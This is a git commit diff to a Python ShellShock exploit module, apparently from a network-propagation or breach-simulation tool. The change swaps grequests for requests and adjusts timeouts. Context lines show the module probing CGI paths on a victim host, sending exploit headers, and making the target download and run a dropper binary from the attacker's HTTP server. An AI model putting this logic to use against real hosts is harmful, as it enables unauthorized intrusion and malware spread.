Removed reliance on grequests. Complicates other code and no real performance improvement in a LAN enviornment.

This commit is contained in:
daniel goldberg 2016-09-21 14:55:13 +03:00
parent 9ab5b178df
commit ab7f731ed5
2 changed files with 12 additions and 14 deletions

View File

@ -8,7 +8,7 @@ from exploit import HostExploiter
from model.host import VictimHost from model.host import VictimHost
from shellshock_resources import CGI_FILES from shellshock_resources import CGI_FILES
from model import MONKEY_ARG from model import MONKEY_ARG
from exploit.tools import get_target_monkey, HTTPTools, report_failed_login from exploit.tools import get_target_monkey, HTTPTools
import requests import requests
__author__ = 'danielg' __author__ = 'danielg'
@ -16,7 +16,7 @@ __author__ = 'danielg'
LOG = logging.getLogger(__name__) LOG = logging.getLogger(__name__)
TIMEOUT = 2 TIMEOUT = 2
TEST_COMMAND = '/bin/uname -a' TEST_COMMAND = '/bin/uname -a'
DOWNLOAD_TIMEOUT = 60 # copied from rdpgrinder DOWNLOAD_TIMEOUT = 300 # copied from rdpgrinder
class ShellShockExploiter(HostExploiter): class ShellShockExploiter(HostExploiter):
@ -37,7 +37,8 @@ class ShellShockExploiter(HostExploiter):
def exploit_host(self, host, depth=-1, src_path=None): def exploit_host(self, host, depth=-1, src_path=None):
assert isinstance(host, VictimHost) assert isinstance(host, VictimHost)
# start by picking ports # start by picking ports
candidate_services = {service: host.services[service] for service in host.services if host.services[service]['name'] == 'http'} candidate_services = {service: host.services[service] for service in host.services if
host.services[service]['name'] == 'http'}
valid_ports = [(port, candidate_services['tcp-' + str(port)]['data'][1]) for port in self.HTTP if valid_ports = [(port, candidate_services['tcp-' + str(port)]['data'][1]) for port in self.HTTP if
'tcp-' + str(port) in candidate_services] 'tcp-' + str(port) in candidate_services]
@ -113,13 +114,14 @@ class ShellShockExploiter(HostExploiter):
http_path, dropper_target_path_linux) http_path, dropper_target_path_linux)
download = exploit + download_command download = exploit + download_command
self.attack_page(url, header, download) self.attack_page(url, header,
download) # we ignore failures here since it might take more than TIMEOUT time
http_thread.join(DOWNLOAD_TIMEOUT) http_thread.join(DOWNLOAD_TIMEOUT)
http_thread.stop() http_thread.stop()
if (http_thread.downloads != 1) or ( if (http_thread.downloads != 1) or (
'ELF' not in self.check_remote_file_exists(url, header, exploit, dropper_target_path_linux)): 'ELF' not in self.check_remote_file_exists(url, header, exploit, dropper_target_path_linux)):
LOG.debug("Exploiter %s failed, http download failed." % self.__class__.__name__) LOG.debug("Exploiter %s failed, http download failed." % self.__class__.__name__)
continue continue
@ -138,7 +140,7 @@ class ShellShockExploiter(HostExploiter):
self._config.dropper_target_path_linux, host, cmdline) self._config.dropper_target_path_linux, host, cmdline)
if not (self.check_remote_file_exists(url, header, exploit, self._config.monkey_log_path_linux)): if not (self.check_remote_file_exists(url, header, exploit, self._config.monkey_log_path_linux)):
LOG.info("Failed running the monkey, log file does not exist") LOG.info("Log file does not exist, monkey might not have run")
continue continue
return True return True
@ -192,20 +194,16 @@ class ShellShockExploiter(HostExploiter):
Checks if which urls exist Checks if which urls exist
:return: Sequence of URLs to try and attack :return: Sequence of URLs to try and attack
""" """
import grequests # at this point, it monkey patches half the world and we must stop it import requests
attack_path = 'http://' attack_path = 'http://'
if is_https: if is_https:
attack_path = 'https://' attack_path = 'https://'
attack_path = attack_path + str(host) + ":" + str(port) attack_path = attack_path + str(host) + ":" + str(port)
attack_urls = [attack_path + url for url in url_list] attack_urls = [attack_path + url for url in url_list]
reqs = (grequests.head(u, verify=False, timeout=TIMEOUT) for u in attack_urls) reqs = [requests.head(u, verify=False, timeout=TIMEOUT) for u in attack_urls]
resps = grequests.map(reqs, size=15) valid_resps = [req for req in reqs if req and req.status_code == requests.codes.ok]
valid_resps = [resp for resp in resps if resp and resp.status_code == requests.codes.ok]
urls = [resp.url for resp in valid_resps] urls = [resp.url for resp in valid_resps]
# revert monkey patch
import socket # this is the monkeypatched socket module
reload(socket)
return urls return urls
@staticmethod @staticmethod

View File

@ -12,4 +12,4 @@ psutil
PyInstaller PyInstaller
ecdsa ecdsa
netifaces netifaces
grequests requests